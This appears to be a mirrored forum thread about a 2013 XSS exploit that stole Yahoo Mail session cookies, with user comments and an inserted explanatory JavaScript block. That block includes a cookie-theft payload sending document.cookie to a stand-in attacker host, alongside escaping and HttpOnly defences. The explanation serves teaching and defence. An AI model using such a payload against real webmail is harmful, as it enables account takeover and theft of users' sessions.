科技回声 (Tech Echo)
Yahoo Mail users hit by widespread XSS exploit

70 points, posted by macleanjr over 12 years ago

10 comments

neya, over 12 years ago
Whenever I hear something negative about Yahoo, I feel really sorry for them. Yahoo used to be a great company a few years back. Their messenger was one of the best products they ever had, and their mail used to be REALLY good (in the early days). But soon they failed to adapt to the market's needs, and they are now where they are. They COULD have been a great company if they had put in as much effort as their competitors had into understanding their market.

The best example was how they failed to respond to Gmail's popularity. Gmail gave away for free almost every single feature that Yahoo charged (and still charges?) a premium for. For example, mail forwarding (POP, IMAP too?) and so on. I personally used to have a .co.uk address with them and eventually moved to Gmail because their ads were in my face, unlike Gmail's, which are very subtle.

Also, the UX on most of Yahoo's sites is terribly poor. Ever visited their homepage? It looks like a cluttered fish market.
gcb0, over 12 years ago
So why does the browser send yahoo.com cookies with a request to abysswhatever.com when the user clicks on the link in the email?

He just created a pretty valid link with no shenanigans... Last I checked, an XSS attack was about making a site churn out JavaScript code when it was not intended to, and then you could make a request that passed that domain's cookies to you.
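The mechanism gcb0 is asking about, as an added example that is not code from the thread or from Yahoo: the browser never sends yahoo.com cookies to another domain. A payload in a mail body that the webmail page renders as markup runs inside the webmail origin, reads `document.cookie` there, and then triggers an ordinary image load to a host the attacker controls with the cookie values in the URL. The rendering helpers, the attacker host, and the cookie values below are all assumed; the cookie names follow the "Y" and "T" cookies mentioned later in the thread. The second half models what `HttpOnly` changes.

```javascript
// Added example, not code from the thread or from Yahoo: how a payload embedded
// in a mail body runs in the webmail origin, and why document.cookie then leaks.
// The rendering helpers, cookie values and attacker host are all assumed.

// Escape untrusted text before placing it into HTML element content.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the untrusted mail body is concatenated straight into the page,
// so any markup it contains becomes part of the DOM of the webmail origin.
function renderMailUnsafe(body) {
  return `<div class="mail-body">${body}</div>`;
}

// Hardened: same template, untrusted text escaped, so markup is shown as text.
function renderMailSafe(body) {
  return `<div class="mail-body">${escapeHtml(body)}</div>`;
}

// A cookie-theft payload of the shape the thread discusses (constructed; the
// host is assumed). Once it executes inside the webmail origin, document.cookie
// is that origin's cookie jar, and the browser will load an image from any host,
// so the cookie values ride out in the URL. Nothing is sent cross-domain by the
// browser on its own: the script runs in the victim's origin and reads what
// script there is allowed to read.
const ATTACKER_HOST = 'attacker.example';
const COOKIE_THEFT_PAYLOAD =
  `<img src=x onerror="(new Image).src='https://${ATTACKER_HOST}/c?'+encodeURIComponent(document.cookie)">`;

// Parse Set-Cookie header lines into { name, httpOnly } records.
function parseSetCookie(headers) {
  return headers.map((line) => {
    const [pair, ...attrs] = line.split(';').map((p) => p.trim());
    return {
      name: pair.slice(0, pair.indexOf('=')),
      httpOnly: attrs.some((a) => a.toLowerCase() === 'httponly'),
    };
  });
}

// Model of what script in the origin can read through document.cookie:
// every cookie that was set without the HttpOnly attribute.
function cookiesReadableByScript(headers) {
  return parseSetCookie(headers)
    .filter((c) => !c.httpOnly)
    .map((c) => c.name);
}

// Cookie names follow the "Y" and "T" cookies mentioned in the thread; the
// values and attributes below are constructed for this demo.
const WEAK_SET_COOKIE = [
  'Y=v=1&n=example; Domain=.yahoo.com; Path=/',
  'T=z=example&a=example; Domain=.yahoo.com; Path=/',
];
const HARDENED_SET_COOKIE = [
  'Y=v=1&n=example; Domain=.yahoo.com; Path=/; Secure; HttpOnly',
  'T=z=example&a=example; Domain=.yahoo.com; Path=/; Secure; HttpOnly',
];

function demo() {
  return {
    unsafeRendersMarkup: renderMailUnsafe(COOKIE_THEFT_PAYLOAD).includes('<img src=x onerror='),
    safeRendersMarkup: renderMailSafe(COOKIE_THEFT_PAYLOAD).includes('<img'),
    weakExposes: cookiesReadableByScript(WEAK_SET_COOKIE),
    hardenedExposes: cookiesReadableByScript(HARDENED_SET_COOKIE),
  };
}

console.log(demo());
```

Two caveats a practitioner would add. Output escaping is the fix for this class of bug; `HttpOnly` only limits the damage, by keeping the session cookie out of `document.cookie`. And script that is already running inside the webmail origin does not need the cookie value at all: it can issue authenticated requests from the victim's session directly, which is enough to send "check out this cool link" mails to the victim's contacts, as later comments in the thread describe.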
eric-hu, over 12 years ago
I believe my Yahoo account was hit by this, since my sent mailbox showed messages with links similar to one I accidentally clicked (from a Gmail account!).

The comments in this thread suggest that the attackers now have my cookies. What can I do to invalidate old cookies for Yahoo mail?
xSwag, over 12 years ago
Exploit in action: http://www.youtube.com/watch?v=iBXvebXo-F4

It is currently being sold for $700 on various semi-public blackhat forums (hence the widespread usage).
ppierald, over 12 years ago
A little heads-up to the Yahoo security team probably would have been appreciated!
randallu, over 12 years ago
So does YMail have anything to do with this? If you were logged into Yahoo and visited the bad page, then Evil, Inc. would still get your Y and T cookies, right?

I have received "Check out this cool link" emails from friends who use Yahoo mail, but I assumed that it was just scraping their Yahoo address book...
mifrai, over 12 years ago
Would following their advice of changing your password actually help in this situation? While it's good practice in general, if I'm understanding this right, the attacker never has your password.
kbanman, over 12 years ago
I personally witnessed two instances of this attack as early as December 8. I couldn't figure out until now how it was done.
Simucal, over 12 years ago
Already, two of my Facebook friends have reported that they have been hit with this vulnerability.
mikekij, over 12 years ago
People still use Yahoo mail?